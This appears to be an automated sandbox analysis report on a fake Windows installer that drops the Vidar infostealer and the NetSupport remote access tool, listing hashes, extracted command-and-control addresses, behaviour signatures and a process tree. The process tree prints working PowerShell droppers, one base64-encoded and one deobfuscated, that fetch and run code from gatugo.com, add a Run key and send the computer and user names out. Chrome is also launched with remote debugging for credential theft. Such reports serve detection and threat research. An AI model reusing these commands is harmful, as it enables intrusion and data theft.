Analysis

  • max time kernel
    503s
  • max time network
    600s
  • platform
    windows11-21h2_x64
  • resource
    win11-20241007-en
  • resource tags

    arch:x64arch:x86image:win11-20241007-enlocale:en-usos:windows11-21h2-x64system
  • submitted
    12-11-2024 17:35

General

  • Target

    Setup_Installer_1.3.6_x64.exe

  • Size

    49.3MB

  • MD5

    29fa71fab96724091fdf7a66dca09c67

  • SHA1

    15fcb631fa6cc825639cd4e15d37d844faac6fdd

  • SHA256

    882759dd0f306ab06f597c2db3011e82eff5bb7515de5d28a20b6913fe7f5626

  • SHA512

    12acf8548f03d230b28d7b5c1eb9009e2ebd7abb06f781c38c15f0d04bae32aded9e692ade4541c2b89e27398de4da853a2a00e94637fea67db4174f710d8a04

  • SSDEEP

    1572864:NwfwuNI9XY9hQtPkGKTD85uMWW7z0PbYF:NCu9oAdETgu3f8F

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

http://gatugo.com/paz/pan4.zip

exe.dropper

http://gatugo.com/paz/pan1.zip

exe.dropper

http://gatugo.com/paz/pan3.zip

exe.dropper

http://gatugo.com/paz/pan2.zip

exe.dropper

http://gatugo.com/pan/

Extracted

Family

vidar

Version

11.7

Botnet

721d3f29688b3d8f568f99a7d2115582

C2

https://5.75.214.111

https://t.me/m07mbk

https://steamcommunity.com/profiles/76561199801589826

Attributes
  • user_agent

    Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.6 Safari/605.1.15 Ddg/17.6

Signatures

  • Detect Vidar Stealer 2 IoCs
  • NetSupport

    NetSupport is a remote access tool sold as a legitimate system administration software.

  • Netsupport family
  • Vidar

    Vidar is an infostealer based on Arkei stealer.

  • Vidar family
  • Blocklisted process makes network request 2 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

    Run Powershell and hide display window.

  • Downloads MZ/PE file
  • Uses browser remote debugging 2 TTPs 12 IoCs

    Can be used control the browser and steal sensitive information such as credentials and session cookies.

  • Executes dropped EXE 7 IoCs
  • Loads dropped DLL 64 IoCs
  • Unsecured Credentials: Credentials In Files 1 TTPs

    Steal credentials from unsecured files.

  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Adds Run key to start application 2 TTPs 1 IoCs
  • Enumerates connected drives 3 TTPs 64 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
  • Suspicious use of SetThreadContext 2 IoCs
  • Drops file in Windows directory 31 IoCs
  • Browser Information Discovery 1 TTPs

    Enumerate browser information.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 46 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Checks SCSI registry key(s) 3 TTPs 5 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Checks processor information in registry 2 TTPs 14 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Delays execution with timeout.exe 1 IoCs
  • Enumerates system info in registry 2 TTPs 9 IoCs
  • Modifies data under HKEY_USERS 2 IoCs
  • Modifies registry class 2 IoCs
  • Suspicious behavior: EnumeratesProcesses 48 IoCs
  • Suspicious behavior: MapViewOfSection 4 IoCs
  • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 15 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 64 IoCs
  • Suspicious use of SendNotifyMessage 12 IoCs
  • Suspicious use of SetWindowsHookEx 6 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

  • Uses Volume Shadow Copy service COM API

    The Volume Shadow Copy service is used to manage backups/snapshots.

Processes

  • C:\Users\Admin\AppData\Local\Temp\Setup_Installer_1.3.6_x64.exe
    "C:\Users\Admin\AppData\Local\Temp\Setup_Installer_1.3.6_x64.exe"
    1⤵
    • Loads dropped DLL
    • Enumerates connected drives
    • System Location Discovery: System Language Discovery
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of FindShellTrayWindow
    • Suspicious use of WriteProcessMemory
    PID:4700
    • C:\Windows\SysWOW64\msiexec.exe
      "C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\United legacy corporation\Setup 1.3.4\install\F5B53CD\Installer.msi" AI_SETUPEXEPATH=C:\Users\Admin\AppData\Local\Temp\Setup_Installer_1.3.6_x64.exe SETUPEXEDIR=C:\Users\Admin\AppData\Local\Temp\ EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1731192677 " AI_EUIMSI=""
      2⤵
      • Enumerates connected drives
      • System Location Discovery: System Language Discovery
      • Suspicious use of FindShellTrayWindow
      PID:1620
  • C:\Windows\system32\msiexec.exe
    C:\Windows\system32\msiexec.exe /V
    1⤵
    • Enumerates connected drives
    • Drops file in Windows directory
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:3568
    • C:\Windows\syswow64\MsiExec.exe
      C:\Windows\syswow64\MsiExec.exe -Embedding 292741160E5CF6CA2598F61EACF77561 C
      2⤵
      • Loads dropped DLL
      • System Location Discovery: System Language Discovery
      PID:3828
    • C:\Windows\system32\srtasks.exe
      C:\Windows\system32\srtasks.exe ExecuteScopeRestorePoint /WaitForRestorePoint:2
      2⤵
        PID:3744
      • C:\Windows\syswow64\MsiExec.exe
        C:\Windows\syswow64\MsiExec.exe -Embedding 32E19A5DB6013FF8C507918C602C8205
        2⤵
        • Loads dropped DLL
        • System Location Discovery: System Language Discovery
        PID:940
      • C:\Windows\syswow64\MsiExec.exe
        C:\Windows\syswow64\MsiExec.exe -Embedding 13E67165B3A95CC20BA6C6831F578A0C C
        2⤵
        • Loads dropped DLL
        • System Location Discovery: System Language Discovery
        PID:2012
      • C:\Windows\syswow64\MsiExec.exe
        C:\Windows\syswow64\MsiExec.exe -Embedding 96C093BADE6DADA41CB9D931F027B1E1
        2⤵
        • Loads dropped DLL
        • System Location Discovery: System Language Discovery
        PID:4608
      • C:\Windows\syswow64\MsiExec.exe
        C:\Windows\syswow64\MsiExec.exe -Embedding 63D46283B43D3F4487420F00C94844C1 C
        2⤵
        • Loads dropped DLL
        • System Location Discovery: System Language Discovery
        PID:1624
      • C:\Windows\syswow64\MsiExec.exe
        C:\Windows\syswow64\MsiExec.exe -Embedding 319F737CD11F04D840E95A7FE81B487C
        2⤵
        • Loads dropped DLL
        • System Location Discovery: System Language Discovery
        PID:4976
      • C:\Users\Admin\AppData\Roaming\United legacy corporation\Setup\install.exe
        "C:\Users\Admin\AppData\Roaming\United legacy corporation\Setup\install.exe"
        2⤵
        • Executes dropped EXE
        • System Location Discovery: System Language Discovery
        • Suspicious use of WriteProcessMemory
        PID:4276
        • C:\Users\Admin\AppData\Roaming\United legacy corporation\Setup\jre\bin\javaw.exe
          "C:\Users\Admin\AppData\Roaming\United legacy corporation\Setup\jre\bin\javaw.exe" -Dfile.encoding=UTF-8 -classpath "lib\.;lib\..;lib\asm-all.jar;lib\dn-compiled-module.jar;lib\dn-php-sdk.jar;lib\gson.jar;lib\jphp-app-framework.jar;lib\jphp-core.jar;lib\jphp-desktop-ext.jar;lib\jphp-gui-ext.jar;lib\jphp-json-ext.jar;lib\jphp-runtime.jar;lib\jphp-xml-ext.jar;lib\jphp-zend-ext.jar;lib\jphp-zip-ext.jar;lib\slf4j-api.jar;lib\slf4j-simple.jar;lib\zt-zip.jar" org.develnext.jphp.ext.javafx.FXLauncher
          3⤵
          • Executes dropped EXE
          • Loads dropped DLL
          • System Location Discovery: System Language Discovery
          • Suspicious use of SetWindowsHookEx
          • Suspicious use of WriteProcessMemory
          PID:3056
          • C:\Windows\SysWOW64\cmd.exe
            C:\Windows\System32\cmd.exe /c "C:\Windows\System32\chcp.com 65001>nul & C:\Windows\SysNative\reg.exe query "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion" /v "CurrentBuild""
            4⤵
            • System Location Discovery: System Language Discovery
            • Suspicious use of WriteProcessMemory
            PID:4620
            • C:\Windows\SysWOW64\chcp.com
              C:\Windows\System32\chcp.com 65001
              5⤵
              • System Location Discovery: System Language Discovery
              PID:4608
            • C:\Windows\system32\reg.exe
              C:\Windows\SysNative\reg.exe query "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion" /v "CurrentBuild"
              5⤵
                PID:2176
            • C:\Windows\SysWOW64\cmd.exe
              C:\Windows\System32\cmd.exe /c "C:\Windows\System32\chcp.com 866>nul & C:\Windows\System32\wbem\wmic.exe CPU get Name /Format:List | C:\Windows\System32\more.com"
              4⤵
              • System Location Discovery: System Language Discovery
              • Suspicious use of WriteProcessMemory
              PID:2632
              • C:\Windows\SysWOW64\chcp.com
                C:\Windows\System32\chcp.com 866
                5⤵
                • System Location Discovery: System Language Discovery
                PID:912
              • C:\Windows\SysWOW64\wbem\WMIC.exe
                C:\Windows\System32\wbem\wmic.exe CPU get Name /Format:List
                5⤵
                • System Location Discovery: System Language Discovery
                PID:4048
              • C:\Windows\SysWOW64\more.com
                C:\Windows\System32\more.com
                5⤵
                • System Location Discovery: System Language Discovery
                PID:5068
            • C:\Windows\SysWOW64\cmd.exe
              C:\Windows\System32\cmd.exe /c "C:\Windows\System32\chcp.com 866>nul & C:\Windows\System32\wbem\wmic.exe Path Win32_VideoController Get AdapterCompatibility /Format:List | C:\Windows\System32\more.com"
              4⤵
              • System Location Discovery: System Language Discovery
              • Suspicious use of WriteProcessMemory
              PID:540
              • C:\Windows\SysWOW64\chcp.com
                C:\Windows\System32\chcp.com 866
                5⤵
                • System Location Discovery: System Language Discovery
                PID:4552
              • C:\Windows\SysWOW64\wbem\WMIC.exe
                C:\Windows\System32\wbem\wmic.exe Path Win32_VideoController Get AdapterCompatibility /Format:List
                5⤵
                • System Location Discovery: System Language Discovery
                PID:4700
              • C:\Windows\SysWOW64\more.com
                C:\Windows\System32\more.com
                5⤵
                • System Location Discovery: System Language Discovery
                PID:2260
            • C:\Windows\SysWOW64\cmd.exe
              C:\Windows\System32\cmd.exe /c "C:\Windows\System32\chcp.com 866>nul & C:\Windows\System32\wbem\wmic.exe path Win32_ComputerSystem get TotalPhysicalMemory /Format:List | C:\Windows\System32\more.com"
              4⤵
              • System Location Discovery: System Language Discovery
              PID:1196
              • C:\Windows\SysWOW64\chcp.com
                C:\Windows\System32\chcp.com 866
                5⤵
                • System Location Discovery: System Language Discovery
                PID:1720
              • C:\Windows\SysWOW64\wbem\WMIC.exe
                C:\Windows\System32\wbem\wmic.exe path Win32_ComputerSystem get TotalPhysicalMemory /Format:List
                5⤵
                • System Location Discovery: System Language Discovery
                PID:3360
              • C:\Windows\SysWOW64\more.com
                C:\Windows\System32\more.com
                5⤵
                • System Location Discovery: System Language Discovery
                PID:4820
            • C:\Windows\SysWOW64\cmd.exe
              C:\Windows\System32\cmd.exe /c "C:\Windows\System32\chcp.com 65001>nul & C:\Windows\SysNative\reg.exe query "HKU\S-1-5-19""
              4⤵
              • System Location Discovery: System Language Discovery
              PID:4596
              • C:\Windows\SysWOW64\chcp.com
                C:\Windows\System32\chcp.com 65001
                5⤵
                • System Location Discovery: System Language Discovery
                PID:4816
              • C:\Windows\system32\reg.exe
                C:\Windows\SysNative\reg.exe query "HKU\S-1-5-19"
                5⤵
                  PID:4280
              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                powershell.exe -ExecutionPolicy Bypass -NoProfile -WindowStyle Hidden -Command "& {$script = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('QWRkLVR5cGUgLUFzc2VtYmx5TmFtZSBTeXN0ZW0uV2luZG93cy5Gb3JtcwpbU3lzdGVtLldpbmRvd3MuRm9ybXMuTWVzc2FnZUJveF06OlNob3coIlRoZSBjb2RlIGV4ZWN1dGlvbiBjYW5ub3QgcHJvY2VlZCBiZWNhdXNlIE1TVkNQMTQwLmRsbCB3YXMgbm90IGZvdW5kLiBSZWluc3RhbGxpbmcgdGhlIHByb2dyYW0gbWF5IGZpeCB0aGlzIHByb2JsZW0uIiwgIlN5c3RlbSBFcnJvciIsIFtTeXN0ZW0uV2luZG93cy5Gb3Jtcy5NZXNzYWdlQm94QnV0dG9uc106Ok9LLCBbU3lzdGVtLldpbmRvd3MuRm9ybXMuTWVzc2FnZUJveEljb25dOjpFcnJvciwgW1N5c3RlbS5XaW5kb3dzLkZvcm1zLk1lc3NhZ2VCb3hEZWZhdWx0QnV0dG9uXTo6QnV0dG9uMSwgW1N5c3RlbS5XaW5kb3dzLkZvcm1zLk1lc3NhZ2VCb3hPcHRpb25zXTo6RGVmYXVsdERlc2t0b3BPbmx5KQ==')); Invoke-Expression $script}"
                4⤵
                • Command and Scripting Interpreter: PowerShell
                • System Location Discovery: System Language Discovery
                • Suspicious behavior: EnumeratesProcesses
                PID:3924
              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                powershell.exe -ExecutionPolicy Bypass -NoProfile -WindowStyle Hidden -Command "& {$script = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('JGY9J2h0dHBzOi8vZ2F0dWdvLmNvbS9oZWFsdGgucGhwP2NvbXBOYW1lPScrJGVudjpjb21wdXRlcm5hbWU7IFtOZXQuU0VydkljRXBPSW50TUFOYWdlUl06OlNFY1VySXR5cHJvVG9Db2wgPSBbbkV0LlNFQ1VyaVRZUHJPVG9jT0x0eXBFXTo6VExTMTI7ICRnb2cgPSBpd3IgJGYgLVVzZUJhc2ljUGFyc2luZyAtVXNlckFnZW50ICdNb3ppbGxhLzUuMCAoV2luZG93cyBOVCA2LjEpIEFwcGxlV2ViS2l0LzUzNy4zNiAoS0hUTUwsIGxpa2UgR2Vja28pIENocm9tZS84MS4wLjQ0NC4xNDMgU2FmYXJpLzUzNy4zNic7IGlleCAkZ29nLkNvbnRlbnQ7')); Invoke-Expression $script}"
                4⤵
                • Blocklisted process makes network request
                • Command and Scripting Interpreter: PowerShell
                • System Location Discovery: System Language Discovery
                • Suspicious behavior: EnumeratesProcesses
                PID:400
                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Nopro -EXE BYpAss -wiN H -encOdEdC $ 2 u B v r 8 = ' h t t p : / / g a t u g o . c o m / p a z / p a n 4 . z i p ' ;   $ 9 R 4 T 4 k S E = ' h t t p : / / g a t u g o . c o m / p a z / p a n 1 . z i p ' ;   $ h o n 2 Y i C = ' n v H 4 t j q s . z i p ' ;   $ E H N y 6 8 0 T = ' P V M t K T G g . z i p ' ;   $ f f Y f o c W = ' i y q 1 m i M o . z i p ' ;   $ 2 V I M b 8 = ' h t t p : / / g a t u g o . c o m / p a z / p a n 3 . z i p ' ;   $ 9 j t s L Q = ' h t t p : / / g a t u g o . c o m / p a z / p a n 2 . z i p ' ;   $ j M K L f h K I = g E T - C O m M A n d   S T A R t - B i T S t r A n S F e R   - E r R O r a C t i O N   s I l e N t l y c O n T i n u e ;   $ S K 2 6 G 0 = ' H a r d D i s k H e a l t h ' ;   C d   $ e N v : a P p D A t a ;   [ n E t . s E r V I c E P o i N t m A N a g e r ] : : S e c u R i t Y p r O t O c o l   =   [ n e T . S E c u r i t Y P r O t O C O l t y p e ] : : T l S 1 2 ;   $ D G r e K j c Z = g c m   e X p a n d - a r c h I V E   - e r R o R a c T I O n   s i l E n t L y C o n t I n u E ;   $ p l f 1 G S Q = ' e 7 W c s M Q . z i p ' ;   $ O F K 7 q t = $ E N V : a p P D a t A + ' \ ' + $ f f Y f o c W ;   $ G R k 9 0 l R q = j o i n - P A t h   - P A t h   $ E N V : A P P D A T A   - c h i l D P a t h   $ p l f 1 G S Q ;   $ S C I O D 0 p Q = " $ e N V : a p P d a T a \ $ h o n 2 Y i C " ;   $ y X 9 E p J K = $ E N V : a p P D a t A + ' \ ' + $ E H N y 6 8 0 T ;   $ w v v p y 9 W A = " b i t S a d m I n . E x E   / t R a n S F E r   H l N W 7 7 o   / d O W n l o a D   / p r I O R i t y   N o R m a l   $ 2 V I M b 8   $ S C I O D 0 p Q " ;   $ 7 6 c 4 J e = " B i T S A d M I N . e X e   / T R a N S f E r   x O V 4 2 c L   / D o w N l o a d   / p r i o R i T y   N o r m a l   $ 2 u B v r 8   $ y X 9 E p J K " ;   $ J j 5 g C 6 G Z = ' b I T s a d M I N . e x e   / T R A n s F E R   D y C I R D o   / d o W N L o a d   / p r i o R I t Y   n O r M A l   ' + $ 9 j t s L Q + '   ' + $ G R k 9 0 l R q ;   $ c h D T J l = $ e n v : a p p d a t a + ' \ ' + $ S K 2 6 G 0 ;   $ O L o z I X = ' B i T S A d M I N . e X e   / T R a N S f E r   x O V 4 2 c L   / D o w N l o a d   / p r i o R i T y   N o r m a l ' ,   $ 9 R 4 T 4 k S E ,   $ O F K 7 q t   - j O I n   '   ' ;   i F   ( $ D G r e K j c Z )   {   I f   ( $ j M K L f h K I )   {   S T A r t - B i t s t r a n s f E r   - S O U R c e   $ 9 j t s L Q   - d E s T I n a t I o N   $ G R k 9 0 l R q ;   S t A R T - b I T S T r A N S F E r   - s O U r C E   $ 9 R 4 T 4 k S E   - D e S T I n a T i o N   $ O F K 7 q t ;   S T A R T - B i T s T r A n S F E R   - s o U r C E   $ 2 V I M b 8   - D E S T i n a T I O n   $ S C I O D 0 p Q ;   s T a r T - b I t S T r A N s F e r   - s o U r C E   $ 2 u B v r 8   - D E s t i n a T i O n   $ y X 9 E p J K ;   }   E L s E   { i e x   - c o m m a n d   $ 7 6 c 4 J e ;   I n V O k E - E X P R e S s I O N   - c O m m a N d   $ J j 5 g C 6 G Z ;   i e x   - C o M M A n d   $ w v v p y 9 W A ;   i e x   - c o m m a n d   $ O L o z I X ;   }   E X p a n d - a r c H i V E   - P A T h   $ O F K 7 q t   - D E S t i N a T I o n P A T h   $ c h D T J l ;   E X p A N d - a R C H i V E   - P a T h   $ S C I O D 0 p Q   - d e S t I n A t i O n P a t h   $ c h D T J l ;   e X P a N D - a R C H I V E   - p A t h   $ G R k 9 0 l R q   - d e s T I N a T i o n p A T h   $ c h D T J l ;   E X P A n D - A R c H i v E   - P a T h   $ y X 9 E p J K   - d e S T I n a T i o n P a T H   $ c h D T J l ;   R M   - p a t H   $ O F K 7 q t ;   R D   - P a t H   $ G R k 9 0 l R q ;   R D   - p a T h   $ y X 9 E p J K ;   r i   - P a T h   $ S C I O D 0 p Q ;   }   e l S e   {   $ E 1 c O 8 E A = @ ( ' T C C T L 3 2 . D L L ' ,   ' m s v c r 1 0 0 . d l l ' ,   ' P C I C L 3 2 . D L L ' ,   ' c l i e n t 3 2 . e x e ' ,   ' A u d i o C a p t u r e . d l l ' ,   ' c l i e n t 3 2 . i n i ' ,   ' N S M . L I C ' ,   ' H T C T L 3 2 . D L L ' ,   ' n s m _ v p r o . i n i ' ,   ' P C I C H E K . D L L ' ,   ' p c i c a p i . d l l ' ,   ' r e m c m d s t u b . e x e ' ,   ' n s k b f l t r . i n f ' ) ;   $ K P A O l l = ' h t t p : / / g a t u g o . c o m / p a n / ' ;   N E W - i t e M   - p a T H   $ e n V : a P P d A t a   - N a M e   $ S K 2 6 G 0   - i t E M T y p e   ' d i r e c t o r y ' ;   i f   ( $ j M K L f h K I )   {   $ E 1 c O 8 E A   |   F o R E a c H   {   $ i i m r O X Y = $ K P A O l l + $ _ ;   $ P 3 3 z g s = $ c h D T J l + ' \ ' + $ _ ;   S t a r t - B I t S t r a n S f e r   - S O U r C e   $ i i m r O X Y   - d e S T i N a T I O N   $ P 3 3 z g s ;   } ; }   e L s e   {   $ E 1 c O 8 E A   |   f O R e a c h - o b J E c t   {   $ i i m r O X Y = $ K P A O l l + $ _ ;   $ P 3 3 z g s = " $ c h D T J l \ $ _ " ;   $ s e Y c y V = ' B i t s A D M i n . e X e   / t R a n s f e r   1 1 x C S q c   / D o w n l O A D   / P r I O R i t Y   N O r M A l   ' ,   $ i i m r O X Y ,   $ P 3 3 z g s   - j O I n   '   ' ;   i e x   - C o M M A n d   $ s e Y c y V ; } ;   } ;   } ;   $ 4 q G o b S C = G e t - i T E m   $ c h D T J l   - F O r c E ;   $ 4 q G o b S C . A t T r i b u t e S = ' H i d d e n ' ;   $ Z T 3 G F a = J O i N - P A t H   - P A T H   $ c h D T J l   - c h I l D P a T H   ' c l i e n t 3 2 . e x e ' ;   C d   $ c h D T J l ;   N e W - i t E m p R o P e R T y   - P a t H   ' H K c U : \ s O f T w a R e \ M i C R o S O F t \ W i N D o W S \ c U r r e n T V E R s i O N \ R u n '   - N a M e   $ S K 2 6 G 0   - V A L u E   $ Z T 3 G F a   - P R o P e r T y t y P e   ' S t r i n g ' ;   S T A r T   c L I e N t 3 2 . E x E ;   $ H O 7 8 = g P s   c l i e n t 3 2   - e R R O r A C t I o n   S I L E N t l y c o N t I n U E ;   $ A 9 O 8 = " h t t p : / / g a t u g o . c o m / s t a t z / s t z . p h p ? c p n m e = $ e N V : C O M p u T e R N A m e & u s n m e = $ E n v : u s E R N A m E & p a r a m = " ;   I F   ( $ H O 7 8 . I d )   {   $ a p W V D = $ A 9 O 8 + ' P a b b 2 ' ;   i n v O k e - W E b R E Q u E s t   $ a p W V D   - u s e b A s I C p a R s i N G ; }   e L s e   {   $ a p W V D = $ A 9 O 8 + ' Z s g Z ' ;   i n v O k e - W E b R E Q u E s t   $ a p W V D   - U S E b a S i c P a r S i N G ; } ; 
                  5⤵
                  • Blocklisted process makes network request
                  • Adds Run key to start application
                  • System Location Discovery: System Language Discovery
                  • Suspicious behavior: EnumeratesProcesses
                  PID:4048
                  • C:\Users\Admin\AppData\Roaming\HardDiskHealth\client32.exe
                    "C:\Users\Admin\AppData\Roaming\HardDiskHealth\client32.exe"
                    6⤵
                    • Executes dropped EXE
                    • System Location Discovery: System Language Discovery
                    • Suspicious use of FindShellTrayWindow
                    • Suspicious use of SetWindowsHookEx
                    PID:3036
              • C:\Windows\SysWOW64\cmd.exe
                cmd /c "cd /d "C:\Users\Admin\AppData\Local\Temp/6c962a106f793249c113dfe4730096aa/" && (for %F in (*.exe) do start "" "%F")"
                4⤵
                • System Location Discovery: System Language Discovery
                PID:688
                • C:\Users\Admin\AppData\Local\Temp\6c962a106f793249c113dfe4730096aa\DPMHelper.exe
                  "DPMHelper.exe"
                  5⤵
                  • Executes dropped EXE
                  • Loads dropped DLL
                  • System Location Discovery: System Language Discovery
                  • Suspicious behavior: EnumeratesProcesses
                  PID:3956
                  • C:\Users\Admin\AppData\Roaming\mwa_patchv3\DPMHelper.exe
                    C:\Users\Admin\AppData\Roaming\mwa_patchv3\DPMHelper.exe
                    6⤵
                    • Executes dropped EXE
                    • Suspicious use of SetThreadContext
                    • System Location Discovery: System Language Discovery
                    • Suspicious behavior: EnumeratesProcesses
                    • Suspicious behavior: MapViewOfSection
                    PID:3088
                    • C:\Windows\SysWOW64\cmd.exe
                      C:\Windows\SysWOW64\cmd.exe
                      7⤵
                      • System Location Discovery: System Language Discovery
                      • Suspicious behavior: EnumeratesProcesses
                      • Suspicious behavior: MapViewOfSection
                      PID:3188
                      • C:\Windows\SysWOW64\explorer.exe
                        C:\Windows\SysWOW64\explorer.exe
                        8⤵
                        • System Location Discovery: System Language Discovery
                        PID:2100
              • C:\Windows\SysWOW64\cmd.exe
                cmd /c "cd /d "C:\Users\Admin\AppData\Local\Temp/d88411800fe77bcb1fb2f8d962f05525/" && (for %F in (*.exe) do start "" "%F")"
                4⤵
                • System Location Discovery: System Language Discovery
                PID:2348
                • C:\Users\Admin\AppData\Local\Temp\d88411800fe77bcb1fb2f8d962f05525\DPMHelper.exe
                  "DPMHelper.exe"
                  5⤵
                  • Executes dropped EXE
                  • Loads dropped DLL
                  • System Location Discovery: System Language Discovery
                  • Suspicious behavior: EnumeratesProcesses
                  PID:4400
                  • C:\Users\Admin\AppData\Roaming\streamMonitorerrv2_x86\DPMHelper.exe
                    C:\Users\Admin\AppData\Roaming\streamMonitorerrv2_x86\DPMHelper.exe
                    6⤵
                    • Executes dropped EXE
                    • Suspicious use of SetThreadContext
                    • System Location Discovery: System Language Discovery
                    • Suspicious behavior: EnumeratesProcesses
                    • Suspicious behavior: MapViewOfSection
                    PID:4200
                    • C:\Windows\SysWOW64\cmd.exe
                      C:\Windows\SysWOW64\cmd.exe
                      7⤵
                      • System Location Discovery: System Language Discovery
                      • Suspicious behavior: EnumeratesProcesses
                      • Suspicious behavior: MapViewOfSection
                      PID:688
                      • C:\Windows\SysWOW64\explorer.exe
                        C:\Windows\SysWOW64\explorer.exe
                        8⤵
                        • System Location Discovery: System Language Discovery
                        • Checks processor information in registry
                        • Suspicious behavior: EnumeratesProcesses
                        PID:2768
                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"
                          9⤵
                          • Uses browser remote debugging
                          • Drops file in Windows directory
                          • Enumerates system info in registry
                          • Modifies data under HKEY_USERS
                          • Suspicious behavior: EnumeratesProcesses
                          • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
                          • Suspicious use of FindShellTrayWindow
                          PID:3432
                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ff843d2cc40,0x7ff843d2cc4c,0x7ff843d2cc58
                            10⤵
                              PID:5088
                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=1932,i,12184367888653900508,15394573142912444566,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=1928 /prefetch:2
                              10⤵
                                PID:4408
                              • C:\Program Files\Google\Chrome\Application\chrome.exe
                                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=1732,i,12184367888653900508,15394573142912444566,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=1964 /prefetch:3
                                10⤵
                                  PID:4360
                                • C:\Program Files\Google\Chrome\Application\chrome.exe
                                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=2172,i,12184367888653900508,15394573142912444566,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=2188 /prefetch:8
                                  10⤵
                                    PID:2604
                                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9223 --lang=en-US --device-scale-factor=1.25 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3124,i,12184367888653900508,15394573142912444566,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3132 /prefetch:1
                                    10⤵
                                    • Uses browser remote debugging
                                    PID:5080
                                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9223 --lang=en-US --device-scale-factor=1.25 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3140,i,12184367888653900508,15394573142912444566,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3276 /prefetch:1
                                    10⤵
                                    • Uses browser remote debugging
                                    PID:3476
                                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9223 --lang=en-US --device-scale-factor=1.25 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4484,i,12184367888653900508,15394573142912444566,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4528 /prefetch:1
                                    10⤵
                                    • Uses browser remote debugging
                                    PID:4832
                                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4612,i,12184367888653900508,15394573142912444566,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4508 /prefetch:8
                                    10⤵
                                      PID:3600
                                    • C:\Program Files\Google\Chrome\Application\chrome.exe
